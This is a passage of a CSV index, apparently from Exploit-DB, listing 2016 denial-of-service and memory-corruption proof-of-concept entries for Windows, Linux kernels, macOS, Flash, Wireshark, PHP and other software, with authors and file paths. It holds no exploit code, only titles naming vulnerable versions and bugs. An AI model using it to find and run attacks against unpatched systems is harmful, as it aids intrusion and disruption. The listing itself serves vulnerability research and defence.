Corruption",2016-03-07,"Google Security Research",windows,dos, -39533,exploits/windows/dos/39533.txt,"Adobe Digital Editions 4.5.0 - '.pdf' Critical Memory Corruption",2016-03-09,"Pier-Luc Maltais",windows,dos, -39537,exploits/linux/dos/39537.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'digi_acceleport' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos, -39538,exploits/linux/dos/39538.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'Wacom' Multiple Nullpointer Dereferences",2016-03-09,"OpenSource Security",linux,dos, -39539,exploits/linux/dos/39539.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor 'treo_attach' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos, -39540,exploits/linux/dos/39540.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor clie_5_attach Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos, -39542,exploits/linux/dos/39542.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'cypress_m8' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos, -39541,exploits/linux/dos/39541.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'mct_u232' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos, -39543,exploits/linux/dos/39543.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'cdc_acm' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos, -39544,exploits/linux/dos/39544.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'aiptek' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos, -39545,exploits/linux/dos/39545.txt,"Linux Kernel 3.10/3.18 /4.4 - Netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",linux,dos, -39546,exploits/windows/dos/39546.txt,"Nitro Pro 10.5.7.32 / Nitro Reader 5.5.3.1 - Heap Memory Corruption",2016-03-10,"Francis Provencher",windows,dos, -39550,exploits/multiple/dos/39550.py,"libotr 4.1.0 - Memory Corruption",2016-03-10,"X41 D-Sec GmbH",multiple,dos, -39551,exploits/multiple/dos/39551.txt,"Putty pscp 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,multiple,dos, -39555,exploits/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos, -39556,exploits/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'iowarrior' Driver Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos, -39557,exploits/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - Overflow (SEH) (Denial of Service)",2016-03-14,INSECT.B,windows,dos, -39560,exploits/windows/dos/39560.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos, -39561,exploits/windows/dos/39561.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos, -39562,exploits/windows/dos/39562.html,"Microsoft Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos, -39565,exploits/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX 'sourceFile' Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos, -39570,exploits/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 (x64) - 'amd64_set_ldt' Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos, -39600,exploits/windows/dos/39600.txt,"Avira - Heap Underflow Parsing PE Section Headers",2016-03-23,"Google Security Research",windows,dos, -39601,exploits/windows/dos/39601.txt,"Comodo - PackMan Unpacker Insufficient Parameter Validation",2016-03-23,"Google Security Research",windows,dos, -39602,exploits/windows/dos/39602.txt,"Comodo - LZMA Decoder Heap Overflow via Insufficient Parameter Checks",2016-03-23,"Google Security Research",windows,dos, -39603,exploits/windows/dos/39603.txt,"Comodo - Integer Overlow Leading to Heap Overflow Parsing Composite Documents",2016-03-23,"Google Security Research",windows,dos, -39604,exploits/multiple/dos/39604.txt,"Wireshark - dissect_ber_integer Static Out-of-Bounds Write",2016-03-23,"Google Security Research",multiple,dos, -39605,exploits/windows/dos/39605.txt,"Comodo - Integer Overflow Leading to Heap Overflow in Win32 Emulation",2016-03-23,"Google Security Research",windows,dos, -39606,exploits/windows/dos/39606.txt,"Comodo AntiVirus - Heap Overflow in LZX Decompression",2016-03-23,"Google Security Research",windows,dos, -39607,exploits/osx/dos/39607.c,"Apple Mac OSX Kernel - Code Execution Due to Lack of Bounds Checking in AppleUSBPipe::Abort",2016-03-23,"Google Security Research",osx,dos, -39608,exploits/windows/dos/39608.txt,"Adobe Flash - Shape Rendering Crash",2016-03-23,"Google Security Research",windows,dos, -39609,exploits/windows/dos/39609.txt,"Adobe Flash - Zlib Codec Heap Overflow",2016-03-23,"Google Security Research",windows,dos, -39610,exploits/windows/dos/39610.txt,"Adobe Flash - Sprite Creation Use-After-Free",2016-03-23,"Google Security Research",windows,dos, -39611,exploits/windows/dos/39611.txt,"Adobe Flash - Uninitialized Stack Parameter Access in AsBroadcaster.broadcastMessage UaF Fix",2016-03-23,"Google Security Research",windows,dos, -39612,exploits/windows/dos/39612.txt,"Adobe Flash - Uninitialized Stack Parameter Access in Object.unwatch UaF Fix",2016-03-23,"Google Security Research",windows,dos, -39613,exploits/windows/dos/39613.txt,"Adobe Flash - Uninitialized Stack Parameter Access in MovieClip.swapDepths UaF Fix",2016-03-23,"Google Security Research",windows,dos, -39614,exploits/osx/dos/39614.c,"Apple Mac OSX Kernel - AppleKeyStore Use-After-Free",2016-03-23,"Google Security Research",osx,dos, -39615,exploits/osx/dos/39615.c,"Apple Mac OSX Kernel - Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in Nvidia Geforce Driver",2016-03-23,"Google Security Research",osx,dos, -39616,exploits/osx/dos/39616.c,"Apple Mac OSX Kernel - Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver",2016-03-23,"Google Security Research",osx,dos, -39627,exploits/windows/dos/39627.py,"TallSoft SNMP/TFTP Server 1.0.0 - Denial of Service",2016-03-28,"Charley Celice",windows,dos,69 -39629,exploits/android/dos/39629.txt,"Android One - mt_wifi IOCTL_GET_STRUCT Privilege Escalation",2016-03-28,"Google Security Research",android,dos, -39633,exploits/multiple/dos/39633.txt,"Apple QuickTime < 7.7.79.80.95 - '.FPX' Parsing Memory Corruption (1)",2016-03-30,"Francis Provencher",multiple,dos, -39634,exploits/multiple/dos/39634.txt,"Apple QuickTime < 7.7.79.80.95 - '.FPX' Parsing Memory Corruption (2)",2016-03-30,"Francis Provencher",multiple,dos, -39635,exploits/multiple/dos/39635.txt,"Apple QuickTime < 7.7.79.80.95 - '.PSD' Parsing Memory Corruption",2016-03-30,"Francis Provencher",multiple,dos, -39638,exploits/linux/dos/39638.txt,"Kamailio 4.3.4 - Heap Based Buffer Overflow",2016-03-30,"Stelios Tsampas",linux,dos, -39644,exploits/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap Based Out-of-Bounds Read",2016-03-31,"Google Security Research",multiple,dos, -39647,exploits/windows/dos/39647.txt,"Microsoft Windows Kernel - Bitmap Use-After-Free",2016-04-01,"Nils Sommer",windows,dos, -39648,exploits/windows/dos/39648.txt,"Microsoft Windows Kernel - 'NtGdiGetTextExtentExW'' Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",windows,dos, -39649,exploits/multiple/dos/39649.txt,"Adobe Flash - URLStream.readObject Use-After-Free",2016-04-01,"Google Security Research",multiple,dos, -39650,exploits/multiple/dos/39650.txt,"Adobe Flash - textfield.maxChars Use-After-Free",2016-04-01,"Google Security Research",multiple,dos, -39651,exploits/android/dos/39651.txt,"Google Android - 'ih264d_process_intra_mb' Memory Corruption",2016-04-01,"Google Security Research",android,dos, -39652,exploits/multiple/dos/39652.txt,"Adobe Flash - Color.setTransform Use-After-Free",2016-04-01,"Google Security Research",multiple,dos, -39653,exploits/php/dos/39653.txt,"PHP 5.5.33 - Invalid Memory Write",2016-04-01,vah_13,php,dos, -39654,exploits/windows/dos/39654.pl,"Xion Audio Player 1.5 (build 160) - '.mp3' Crash (PoC)",2016-04-04,"Charley Celice",windows,dos, -39657,exploits/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos, -39663,exploits/windows/dos/39663.html,"Microsoft Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",windows,dos, -39669,exploits/lin_x86/dos/39669.txt,"Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco & Ismael Ripoll",lin_x86,dos, -39685,exploits/android/dos/39685.txt,"Google Android - IOMX 'getConfig'/'getParameter' Information Disclosure",2016-04-11,"Google Security Research",android,dos, -39686,exploits/android/dos/39686.txt,"Google Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos, -39699,exploits/windows/dos/39699.html,"Microsoft Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use-After-Free",2016-04-15,"Marcin Ressel",windows,dos, -39706,exploits/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard-Coded Credentials",2016-04-18,DLY,hardware,dos, -39712,exploits/win_x86-64/dos/39712.txt,"Microsoft Windows Kernel - DrawMenuBarTemp Wild-Write (MS16-039)",2016-04-20,"Nils Sommer",win_x86-64,dos, -39713,exploits/windows/dos/39713.c,"Hyper-V - 'vmswitch.sys' VmsMpCommonPvtHandleMulticastOids Guest to Host Kernel-Pool Overflow",2016-04-20,"Google Security Research",windows,dos, -39733,exploits/linux/dos/39733.py,"Rough Auditing Tool for Security (RATS) 2.3 - Crash (PoC)",2016-04-25,"David Silveiro",linux,dos, -39740,exploits/windows/dos/39740.cpp,"Microsoft Windows - CSRSS BaseSrvCheckVDM Session 0 Process Creation Privilege Escalation (MS16-048)",2016-04-27,"Google Security Research",windows,dos, -39743,exploits/windows/dos/39743.txt,"Microsoft Windows Kernel - 'win32k.sys' TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)",2016-04-28,"Google Security Research",windows,dos, -39747,exploits/linux/dos/39747.py,"Rough Auditing Tool for Security (RATS) 2.3 - Array Out of Block Crash",2016-04-29,"David Silveiro",linux,dos, -39748,exploits/multiple/dos/39748.txt,"Wireshark - dissect_2008_16_security_4 Stack Based Buffer Overflow",2016-04-29,"Google Security Research",multiple,dos, -39749,exploits/multiple/dos/39749.txt,"Wireshark - alloc_address_wmem Assertion Failure",2016-04-29,"Google Security Research",multiple,dos, -39750,exploits/multiple/dos/39750.txt,"Wireshark - ett_zbee_zcl_pwr_prof_enphases Static Out-of-Bounds Read",2016-04-29,"Google Security Research",multiple,dos, -39767,exploits/multiple/dos/39767.txt,"ImageMagick 6.9.3-9/7.0.1-0 - Multiple Vulnerabilities (ImageTragick)",2016-05-04,"Nikolay Ermishkin",multiple,dos, -39768,exploits/multiple/dos/39768.txt,"OpenSSL - Padding Oracle in AES-NI CBC MAC Check",2016-05-04,"Juraj Somorovsky",multiple,dos, -39770,exploits/windows/dos/39770.txt,"McAfee LiveSafe 14.0 - Relocations Processing Memory Corruption",2016-05-04,"Google Security Research",windows,dos, -39773,exploits/linux/dos/39773.txt,"Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps",2016-05-04,"Google Security Research",linux,dos, -39774,exploits/windows/dos/39774.html,"Baidu Spark Browser 43.23.1000.476 - Address Bar URL Spoofing",2016-05-05,"liu zhu",windows,dos, -39775,exploits/windows/dos/39775.py,"RPCScan 2.03 - Hostname/IP Field Crash (PoC)",2016-05-06,"Irving Aguilar",windows,dos, -39776,exploits/windows/dos/39776.py,"CIScan 1.00 - Hostname/IP Field Crash (PoC)",2016-05-06,"Irving Aguilar",windows,dos, -39778,exploits/windows/dos/39778.txt,"Adobe Flash (Multiple Scripts) - Use-After-Free When Rendering Displays (2)",2016-05-06,"Google Security Research",windows,dos, -39779,exploits/windows/dos/39779.txt,"Adobe Flash - MovieClip.duplicateMovieClip Use-After-Free",2016-05-06,"Google Security Research",windows,dos, -39782,exploits/windows/dos/39782.py,"i.FTP 2.21 - Host Address / URL Field (SEH)",2016-05-09,"Tantaryu MING",windows,dos, -39785,exploits/windows/dos/39785.cs,"ASUS Memory Mapping Driver (ASMMAP/ASMMAP64) - Physical Memory Read/Write",2016-05-09,slipstream,windows,dos, -39789,exploits/windows/dos/39789.py,"RPCScan 2.03 - Hostname/IP Field Overwrite (SEH) (PoC)",2016-05-09,"Nipun Jaswal",windows,dos, -39966,exploits/windows/dos/39966.txt,"Blat 3.2.14 - Stack Overflow",2016-06-16,Vishnu,windows,dos, -39795,exploits/windows/dos/39795.pl,"MediaInfo 0.7.61 - Crash (PoC)",2016-05-10,"Mohammad Reza Espargham",windows,dos, -39796,exploits/windows/dos/39796.py,"Ipswitch WS_FTP LE 12.3 - Search field Overwrite (SEH) (PoC)",2016-05-10,"Zahid Adeel",windows,dos, -39797,exploits/win_x86/dos/39797.py,"Core FTP Server 32-bit Build 587 - Heap Overflow",2016-05-10,"Paul Purcell",win_x86,dos,21 -39799,exploits/multiple/dos/39799.txt,"Adobe Reader DC 15.010.20060 - Memory Corruption",2016-05-10,"Pier-Luc Maltais",multiple,dos, -39800,exploits/linux/dos/39800.txt,"Nfdump Nfcapd 1.6.14 - Multiple Vulnerabilities",2016-05-10,Security-Assessment.com,linux,dos, -39801,exploits/android/dos/39801.c,"Google Android Broadcom Wi-Fi Driver - Memory Corruption",2016-05-11,AbdSec,android,dos, -39802,exploits/windows/dos/39802.py,"CIScan 1.00 - Hostname/IP Field Overwrite (SEH) (PoC)",2016-05-11,"Nipun Jaswal",windows,dos, -39812,exploits/multiple/dos/39812.txt,"Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Based Out-of-Bounds Read (2)",2016-05-13,"Google Security Research",multiple,dos, -39819,exploits/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash (PoC) (2)",2016-05-16,HauntIT,windows,dos, -39824,exploits/multiple/dos/39824.txt,"Adobe Flash - JXR Processing Out-of-Bounds Read",2016-05-17,"Google Security Research",multiple,dos, -39825,exploits/multiple/dos/39825.txt,"Adobe Flash - Out-of-Bounds Read when Placing Object",2016-05-17,"Google Security Research",multiple,dos, -39826,exploits/multiple/dos/39826.txt,"Adobe Flash - Overflow in Processing Raw 565 Textures",2016-05-17,"Google Security Research",multiple,dos, -39827,exploits/multiple/dos/39827.txt,"Adobe Flash - Heap Overflow in ATF Processing Image Reading",2016-05-17,"Google Security Research",multiple,dos, -39828,exploits/multiple/dos/39828.txt,"Adobe Flash - '.MP4' Stack Corruption",2016-05-17,"Google Security Research",multiple,dos, -39829,exploits/multiple/dos/39829.txt,"Adobe Flash - Type Confusion in FileReference Constructor",2016-05-17,"Google Security Research",multiple,dos, -39830,exploits/multiple/dos/39830.txt,"Adobe Flash - addProperty Use-After-Free",2016-05-17,"Google Security Research",multiple,dos, -39831,exploits/multiple/dos/39831.txt,"Adobe Flash - SetNative Use-After-Free",2016-05-17,"Google Security Research",multiple,dos, -39832,exploits/windows/dos/39832.txt,"Microsoft Windows - 'gdi32.dll' Multiple 'EMF CREATECOLORSPACEW' Record Handling (MS16-055)",2016-05-17,"Google Security Research",windows,dos, -39833,exploits/windows/dos/39833.txt,"Microsoft Windows - 'gdi32.dll' Multiple 'EMF COMMENT_MULTIFORMATS' Record Handling (MS16-055)",2016-05-17,"Google Security Research",windows,dos, -39834,exploits/multiple/dos/39834.txt,"Microsoft Windows - 'gdi32.dll' Heap Based Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055)",2016-05-17,"Google Security Research",multiple,dos, -39835,exploits/multiple/dos/39835.txt,"Symantec/Norton AntiVirus - ASPack Remote Heap/Pool Memory Corruption",2016-05-17,"Google Security Research",multiple,dos, -39842,exploits/linux/dos/39842.txt,"4digits 1.1.4 - Local Buffer Overflow",2016-05-19,N_A,linux,dos, -39846,exploits/windows/dos/39846.txt,"Operation Technology ETAP 14.1.0 - Multiple Stack Buffer Overrun Vulnerabilities",2016-05-23,LiquidWorm,windows,dos, -39857,exploits/windows/dos/39857.txt,"Micro Focus Rumba+ 9.4 - Multiple Stack Buffer Overflow Vulnerabilities",2016-05-26,LiquidWorm,windows,dos, -39859,exploits/multiple/dos/39859.txt,"Graphite2 - GlyphCache::GlyphCache Heap Based Buffer Overflow",2016-05-26,"Google Security Research",multiple,dos, -39860,exploits/multiple/dos/39860.txt,"Graphite2 - GlyphCache::Loader Heap Based Overreads",2016-05-26,"Google Security Research",multiple,dos, -39861,exploits/multiple/dos/39861.txt,"Graphite2 - TtfUtil::CheckCmapSubtable12 Heap Based Overread",2016-05-26,"Google Security Research",multiple,dos, -39862,exploits/multiple/dos/39862.txt,"Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap Based Overread",2016-05-26,"Google Security Research",multiple,dos, -39863,exploits/multiple/dos/39863.txt,"Graphite2 - NameTable::getName Multiple Heap Based Out-of-Bounds Reads",2016-05-26,"Google Security Research",multiple,dos, -39867,exploits/multiple/dos/39867.py,"MySQL 5.5.45 - procedure analyse Function Denial of Service",2016-05-30,"Osanda Malith",multiple,dos, -39873,exploits/linux/dos/39873.py,"CCextractor 0.80 - Crash (PoC)",2016-05-31,"David Silveiro",linux,dos, -39875,exploits/linux/dos/39875.py,"TCPDump 4.5.1 - Crash (PoC)",2016-05-31,"David Silveiro",linux,dos, -39877,exploits/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos, -39882,exploits/multiple/dos/39882.txt,"Websockify (C Implementation) 0.8.0 - Buffer Overflow",2016-06-02,"RedTeam Pentesting GmbH",multiple,dos, -39906,exploits/multiple/dos/39906.txt,"Microsoft Word (Windows/OSX) - Crash (PoC)",2016-06-09,halsten,multiple,dos, -39915,exploits/windows/dos/39915.c,"Armadito Antimalware - Backdoor/Bypass",2016-06-10,Ax.,windows,dos, -39920,exploits/osx/dos/39920.c,"Apple Mac OSX Kernel - Null Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext",2016-06-10,"Google Security Research",osx,dos, -39921,exploits/android/dos/39921.txt,"Google Android - '/system/bin/sdcard' Stack Buffer Overflow",2016-06-10,"Google Security Research",android,dos, -39922,exploits/osx/dos/39922.c,"Apple Mac OSX Kernel - Null Pointer Dereference in AppleMuxControl.kext",2016-06-10,"Google Security Research",osx,dos, -39923,exploits/osx/dos/39923.c,"Apple Mac OSX Kernel - Null Pointer Dereference in AppleGraphicsDeviceControl",2016-06-10,"Google Security Research",osx,dos, -39924,exploits/osx/dos/39924.c,"Apple Mac OSX Kernel - NULL Dereference in IOAccelSharedUserClient2::page_off_resource",2016-06-10,"Google Security Research",osx,dos, -39925,exploits/osx/dos/39925.c,"Apple Mac OSX Kernel - NULL Dereference in CoreCaptureResponder Due to Unchecked Return Value",2016-06-10,"Google Security Research",osx,dos, -39926,exploits/osx/dos/39926.c,"Apple Mac OSX Kernel - Null Pointer Dereference in IOAudioEngine",2016-06-10,"Google Security Research",osx,dos, -39927,exploits/osx/dos/39927.c,"Apple Mac OSX Kernel - Out-of-Bounds Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type",2016-06-10,"Google Security Research",osx,dos, -39928,exploits/osx/dos/39928.c,"Apple Mac OSX Kernel - Use-After-Free Due to Bad Locking in IOAcceleratorFamily2",2016-06-10,"Google Security Research",osx,dos, -39929,exploits/multiple/dos/39929.c,"Apple Mac OSX / iOS Kernel - UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient",2016-06-10,"Google Security Research",multiple,dos, -39930,exploits/osx/dos/39930.c,"Apple Mac OSX Kernel - GeForce GPU Driver Stack Buffer Overflow",2016-06-10,"Google Security Research",osx,dos, -39939,exploits/linux/dos/39939.rb,"iSQL 1.0 - 'isql_main.c' Buffer Overflow (PoC)",2016-06-13,HaHwul,linux,dos, -39940,exploits/linux/dos/39940.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap Based Memory Corruption",2016-06-13,"Google Security Research",linux,dos, -39941,exploits/linux/dos/39941.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_DIBSource::TranslateScanline24bpp Out-of-Bounds Read",2016-06-13,"Google Security Research",linux,dos, -39942,exploits/linux/dos/39942.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_WideString::operator= Invalid Read",2016-06-13,"Google Security Research",linux,dos, -39943,exploits/linux/dos/39943.txt,"Foxit PDF Reader 1.0.1.0925 - kdu_core::kdu_codestream::get_subsampling Memory Corruption",2016-06-13,"Google Security Research",linux,dos, -39944,exploits/linux/dos/39944.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_BaseSegmentedArray::IterateIndex Memory Corruption",2016-06-13,"Google Security Research",linux,dos, -39947,exploits/windows/dos/39947.py,"Oracle Orakill.exe 11.2.0 - Buffer Overflow",2016-06-14,hyp3rlinx,windows,dos, -39959,exploits/windows/dos/39959.txt,"Microsoft Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (1)",2016-06-15,"Nils Sommer",windows,dos, -39960,exploits/windows/dos/39960.txt,"Microsoft Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (2)",2016-06-15,"Nils Sommer",windows,dos, -39961,exploits/linux/dos/39961.txt,"Google Chrome - GPU Process MailboxManagerImpl Double-Read",2016-06-15,"Google Security Research",linux,dos, -39986,exploits/linux/dos/39986.py,"Banshee 2.6.2 - '.mp3' Crash (PoC)",2016-06-21,"Ilca Lucian",linux,dos, -39990,exploits/windows/dos/39990.txt,"Microsoft Windows - 'gdi32.dll' Multiple DIB-Related EMF Record Handlers Heap Based Out-of-Bounds Reads/Memory Disclosure (MS16-074)",2016-06-21,"Google Security Research",windows,dos, -39991,exploits/windows/dos/39991.txt,"Microsoft Windows Kernel - 'ATMFD.dll' NamedEscape 0x250C Pool Corruption (MS16-074)",2016-06-21,"Google Security Research",windows,dos, -39993,exploits/win_x86/dos/39993.txt,"Microsoft Windows - Custom Font Disable Policy Bypass",2016-06-21,"Google Security Research",win_x86,dos, -39994,exploits/windows/dos/39994.html,"Microsoft Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063)",2016-06-21,Skylined,windows,dos, -40014,exploits/hardware/dos/40014.txt,"Magnet Networks Tesley CPVA 642 Router - Weak WPA-PSK Passphrase Algorithm",2016-06-27,"Matt O'Connor",hardware,dos, -40031,exploits/multiple/dos/40031.txt,"Symantec AntiVirus - Unpacking RAR Multiple Remote Memory Corruptions",2016-06-29,"Google Security Research",multiple,dos, -40032,exploits/multiple/dos/40032.txt,"Symantec AntiVirus - 'dec2lha Library' Remote Stack Buffer Overflow",2016-06-29,"Google Security Research",multiple,dos, -40034,exploits/multiple/dos/40034.txt,"Symantec AntiVirus - Heap Overflow Modifying MIME Messages",2016-06-29,"Google Security Research",multiple,dos, -40035,exploits/multiple/dos/40035.txt,"Symantec AntiVirus - TNEF Decoder Integer Overflow",2016-06-29,"Google Security Research",multiple,dos, -40036,exploits/multiple/dos/40036.txt,"Symantec AntiVirus - Missing Bounds Checks in dec2zip ALPkOldFormatDecompressor::UnShrink",2016-06-29,"Google Security Research",multiple,dos, -40037,exploits/multiple/dos/40037.txt,"Symantec AntiVirus - PowerPoint Misaligned Stream-cache Remote Stack Buffer Overflow",2016-06-29,"Google Security Research",multiple,dos, -40038,exploits/windows/dos/40038.py,"Core FTP LE 2.2 - Path Field Local Buffer Overflow",2016-06-29,Netfairy,windows,dos, -40073,exploits/windows/dos/40073.py,"Microsoft Process Kill Utility (kill.exe) 6.3.9600.17298 - Crash (PoC)",2016-07-08,hyp3rlinx,windows,dos, -40074,exploits/windows/dos/40074.txt,"Microsoft WinDbg - 'logviewer.exe' Crash (PoC)",2016-07-08,hyp3rlinx,windows,dos, -40183,exploits/multiple/dos/40183.html,"WebKit - TypedArray.fill Memory Corruption",2016-07-29,"Google Security Research",multiple,dos, -40182,exploits/arm/dos/40182.txt,"Linux ARM/ARM64 - 'perf_event_open()' Arbitrary Memory Read",2016-07-29,"Google Security Research",arm,dos, -40310,exploits/multiple/dos/40310.txt,"Adobe Flash - BitmapData.copyPixels Use-After-Free",2016-08-29,"Google Security Research",multiple,dos, -40181,exploits/linux/dos/40181.c,"AppArmor securityfs < 4.8 - 'aa_fs_seq_hash_show' Reference Count Leak",2016-07-29,"Google Security Research",linux,dos, -40155,exploits/php/dos/40155.py,"PHP 5.5.37/5.6.23/7.0.8 - 'bzread()' Out-of-Bounds Write",2016-07-25,"Hans Jerry Illikainen",php,dos,80 -40184,exploits/multiple/dos/40184.html,"WebKit - TypedArray.copyWithin Memory Corruption",2016-07-29,"Google Security Research",multiple,dos, -40192,exploits/windows/dos/40192.py,"Halliburton LogView Pro 9.7.5 - '.cgm' / '.tif' / '.tiff' / '.tifh' Crash (PoC)",2016-08-01,"Karn Ganeshen",windows,dos, -40194,exploits/multiple/dos/40194.txt,"Wireshark 1.12.0 < 1.12.12 - NDS Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos, -40195,exploits/multiple/dos/40195.txt,"Wireshark 2.0.0 < 2.0.4 - MMSE / WAP / WBXML / WSP Dissectors Denial of Service",2016-08-03,"Antti Levomäki",multiple,dos, -40196,exploits/win_x86-64/dos/40196.txt,"Wireshark 2.0.0 < 2.0.4 - CORBA IDL Dissectors Denial of Service",2016-08-03,Igor,win_x86-64,dos, -40197,exploits/multiple/dos/40197.txt,"Wireshark 1.12.0 < 1.12.12 / 2.0.0 < 2.0.4 - PacketBB Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos, -40198,exploits/multiple/dos/40198.txt,"Wireshark 1.12.0 < 1.12.12 / 2.0.0 < 2.0.4 - WSP Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos, -40199,exploits/multiple/dos/40199.txt,"Wireshark 1.12.0 < 1.12.12 / 2.0.0 < 2.0.4 - RLC Dissector Denial of Service",2016-08-03,"Antti Levomäki",multiple,dos, -40208,exploits/windows/dos/40208.py,"Kodi Web Server 16.1 - Denial of Service",2016-08-05,"Guillaume Kaddouch",windows,dos,8080 -40230,exploits/linux/dos/40230.txt,"SAP SAPCAR - Multiple Vulnerabilities",2016-08-10,"Core Security",linux,dos, -40238,exploits/multiple/dos/40238.txt,"Microsoft Word 2013/2016 - sprmSdyaTop Denial of Service (MS16-099)",2016-08-16,COSIG,multiple,dos, -40243,exploits/osx/dos/40243.html,"Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use-After-Free (PoC)",2013-04-04,"Google Security Research",osx,dos, -40253,exploits/windows/dos/40253.html,"Microsoft Internet Explorer - MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal Read AV",2016-08-16,"Google Security Research",windows,dos, -40255,exploits/windows/dos/40255.txt,"Microsoft Windows - GDI+ DecodeCompressedRLEBitmap Invalid Pointer Arithmetic Out-of-Bounds Write (MS16-097)",2016-08-17,"Google Security Research",windows,dos, -40256,exploits/windows/dos/40256.txt,"Microsoft Windows - GDI+ ValidateBitmapInfo Invalid Pointer Arithmetic Out-of-Bounds Reads (MS16-097)",2016-08-17,"Google Security Research",windows,dos, -40257,exploits/windows/dos/40257.txt,"Microsoft Windows - GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",windows,dos, -40308,exploits/multiple/dos/40308.txt,"Adobe Flash - Stage.align Setter Use-After-Free",2016-08-29,"Google Security Research",multiple,dos, -40289,exploits/hardware/dos/40289.txt,"ObiHai ObiPhone 1032/1062 < 5-0-0-3497 - Multiple Vulnerabilities",2016-08-22,"David Tomaschik",hardware,dos, -40291,exploits/linux/dos/40291.txt,"Eye of Gnome 3.10.2 - GMarkup Out of Bounds Write",2016-08-23,"Kaslov Dmitri",linux,dos, -40309,exploits/multiple/dos/40309.txt,"Adobe Flash - Use-After-Free When Returning Rectangle",2016-08-29,"Google Security Research",multiple,dos, -40311,exploits/multiple/dos/40311.txt,"Adobe Flash - MovieClip Transform Getter Use-After-Free",2016-08-29,"Google Security Research",multiple,dos, -40313,exploits/php/dos/40313.php,"PHP 5.0.0 - 'imap_mail()' Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos, -40314,exploits/php/dos/40314.php,"PHP 5.0.0 - 'hw_docbyanchor()' Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos, -40315,exploits/php/dos/40315.php,"PHP 5.0.0 - 'html_doc_file()' Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos, -40316,exploits/php/dos/40316.php,"PHP 5.0.0 - 'snmpwalkoid()' Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos, -40317,exploits/php/dos/40317.php,"PHP 5.0.0 - 'fbird_[p]connect()' Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos, -40318,exploits/php/dos/40318.php,"PHP 5.0.0 - 'snmpwalk()' Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos, -40319,exploits/php/dos/40319.php,"PHP 5.0.0 - 'snmprealwalk()' Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos, 